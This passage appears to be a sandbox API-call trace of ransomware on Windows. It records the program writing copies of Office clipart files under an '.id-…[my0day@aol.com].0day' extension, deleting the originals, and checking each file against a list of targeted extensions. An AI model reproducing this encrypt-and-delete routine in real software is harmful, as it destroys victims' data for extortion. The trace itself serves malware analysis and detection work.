Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.634] GetLastError () returned 0x0 [0273.634] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xaec, lpOverlapped=0x0) returned 1 [0273.636] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xaf0, lpOverlapped=0x0) returned 1 [0273.637] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.637] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.637] SetEndOfFile (hFile=0x384) returned 1 [0273.637] CloseHandle (hObject=0x384) returned 1 [0273.637] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.637] SetEndOfFile (hFile=0x39c) returned 1 [0273.640] CloseHandle (hObject=0x39c) returned 1 [0273.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.640] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf")) returned 1 [0273.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.640] lstrlenW (lpString=".doc") returned 4 [0273.640] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.640] lstrlenW (lpString=".docx") returned 5 [0273.640] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.640] lstrlenW (lpString=".pdf") returned 4 [0273.640] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.640] lstrlenW (lpString=".xls") returned 4 [0273.640] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.640] lstrlenW (lpString=".xlsx") returned 5 [0273.640] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.640] lstrlenW (lpString=".ppt") returned 4 [0273.640] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.640] lstrlenW (lpString=".zip") returned 4 [0273.640] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.640] lstrlenW (lpString=".rar") returned 4 [0273.640] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.640] lstrlenW (lpString=".bz2") returned 4 [0273.640] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.640] lstrlenW (lpString=".7z") returned 3 [0273.641] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.641] lstrlenW (lpString=".dbf") returned 4 [0273.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.641] lstrlenW (lpString=".1cd") returned 4 [0273.641] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.641] lstrlenW (lpString=".jpg") returned 4 [0273.641] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.641] lstrlenW (lpString=".doc") returned 4 [0273.641] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString=".docx") returned 5 [0273.641] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.641] lstrlenW (lpString=".pdf") returned 4 [0273.641] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString=".xls") returned 4 [0273.641] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.641] lstrlenW (lpString=".xlsx") returned 5 [0273.641] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.641] lstrlenW (lpString=".ppt") returned 4 [0273.641] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.641] lstrlenW (lpString=".zip") returned 4 [0273.641] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.641] lstrlenW (lpString=".rar") returned 4 [0273.641] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString=".bz2") returned 4 [0273.641] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.641] lstrlenW (lpString=".7z") returned 3 [0273.641] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.641] lstrlenW (lpString=".dbf") returned 4 [0273.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.642] lstrlenW (lpString=".1cd") returned 4 [0273.642] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 63 [0273.642] lstrlenW (lpString=".jpg") returned 4 [0273.642] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.642] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.642] lstrlenW (lpString="DD01151_.WMF") returned 12 [0273.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.642] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2960) returned 1 [0273.642] CloseHandle (hObject=0x39c) returned 1 [0273.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 0x20 [0273.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.643] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.643] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.643] GetLastError () returned 0x0 [0273.643] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xb90, lpOverlapped=0x0) returned 1 [0273.645] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xba0, lpOverlapped=0x0) returned 1 [0273.646] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.646] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.646] SetEndOfFile (hFile=0x384) returned 1 [0273.646] CloseHandle (hObject=0x384) returned 1 [0273.646] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.646] SetEndOfFile (hFile=0x39c) returned 1 [0273.651] CloseHandle (hObject=0x39c) returned 1 [0273.651] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.651] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf")) returned 1 [0273.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.651] lstrlenW (lpString=".doc") returned 4 [0273.651] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.651] lstrlenW (lpString=".docx") returned 5 [0273.651] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.651] lstrlenW (lpString=".pdf") returned 4 [0273.651] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.651] lstrlenW (lpString=".xls") returned 4 [0273.651] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.651] lstrlenW (lpString=".xlsx") returned 5 [0273.651] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.651] lstrlenW (lpString=".ppt") returned 4 [0273.651] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.652] lstrlenW (lpString=".zip") returned 4 [0273.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.652] lstrlenW (lpString=".rar") returned 4 [0273.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString=".bz2") returned 4 [0273.652] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString=".7z") returned 3 [0273.652] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.652] lstrlenW (lpString=".dbf") returned 4 [0273.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.652] lstrlenW (lpString=".1cd") returned 4 [0273.652] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.652] lstrlenW (lpString=".jpg") returned 4 [0273.652] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.652] lstrlenW (lpString=".doc") returned 4 [0273.652] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString=".docx") returned 5 [0273.652] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.652] lstrlenW (lpString=".pdf") returned 4 [0273.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString=".xls") returned 4 [0273.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.652] lstrlenW (lpString=".xlsx") returned 5 [0273.652] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.652] lstrlenW (lpString=".ppt") returned 4 [0273.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.652] lstrlenW (lpString=".zip") returned 4 [0273.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.652] lstrlenW (lpString=".rar") returned 4 [0273.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.653] lstrlenW (lpString=".bz2") returned 4 [0273.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.653] lstrlenW (lpString=".7z") returned 3 [0273.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.653] lstrlenW (lpString=".dbf") returned 4 [0273.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.653] lstrlenW (lpString=".1cd") returned 4 [0273.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 63 [0273.653] lstrlenW (lpString=".jpg") returned 4 [0273.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.653] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.653] lstrlenW (lpString="DD01152_.WMF") returned 12 [0273.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.653] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2960) returned 1 [0273.653] CloseHandle (hObject=0x39c) returned 1 [0273.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf")) returned 0x20 [0273.653] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.654] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.654] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.654] GetLastError () returned 0x0 [0273.654] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xb90, lpOverlapped=0x0) returned 1 [0273.656] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xba0, lpOverlapped=0x0) returned 1 [0273.657] ReadFile (in: hFile=0x39c, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.657] WriteFile (in: hFile=0x384, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.657] SetEndOfFile (hFile=0x384) returned 1 [0273.657] CloseHandle (hObject=0x384) returned 1 [0273.657] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.657] SetEndOfFile (hFile=0x39c) returned 1 [0273.659] CloseHandle (hObject=0x39c) returned 1 [0273.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.660] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01152_.wmf")) returned 1 [0273.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.660] lstrlenW (lpString=".doc") returned 4 [0273.660] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.660] lstrlenW (lpString=".docx") returned 5 [0273.660] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.660] lstrlenW (lpString=".pdf") returned 4 [0273.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.660] lstrlenW (lpString=".xls") returned 4 [0273.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.660] lstrlenW (lpString=".xlsx") returned 5 [0273.660] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.660] lstrlenW (lpString=".ppt") returned 4 [0273.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.660] lstrlenW (lpString=".zip") returned 4 [0273.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.660] lstrlenW (lpString=".rar") returned 4 [0273.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.660] lstrlenW (lpString=".bz2") returned 4 [0273.660] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.660] lstrlenW (lpString=".7z") returned 3 [0273.660] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString=".dbf") returned 4 [0273.661] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString=".1cd") returned 4 [0273.661] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString=".jpg") returned 4 [0273.661] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString=".doc") returned 4 [0273.661] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString=".docx") returned 5 [0273.661] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.661] lstrlenW (lpString=".pdf") returned 4 [0273.661] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString=".xls") returned 4 [0273.661] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.661] lstrlenW (lpString=".xlsx") returned 5 [0273.661] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.661] lstrlenW (lpString=".ppt") returned 4 [0273.661] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString=".zip") returned 4 [0273.661] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.661] lstrlenW (lpString=".rar") returned 4 [0273.661] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString=".bz2") returned 4 [0273.661] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString=".7z") returned 3 [0273.661] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString=".dbf") returned 4 [0273.661] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.661] lstrlenW (lpString=".1cd") returned 4 [0273.662] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 63 [0273.662] lstrlenW (lpString=".jpg") returned 4 [0273.662] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.662] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.662] lstrlenW (lpString="DD01157_.WMF") returned 12 [0273.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.874] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=3588) returned 1 [0273.874] CloseHandle (hObject=0x2cc) returned 1 [0273.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf")) returned 0x20 [0273.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.960] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.960] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.960] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01157_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01157_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.961] GetLastError () returned 0x0 [0273.961] ReadFile (in: hFile=0x380, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xe04, lpOverlapped=0x0) returned 1 [0273.981] WriteFile (in: hFile=0x37c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xe10, 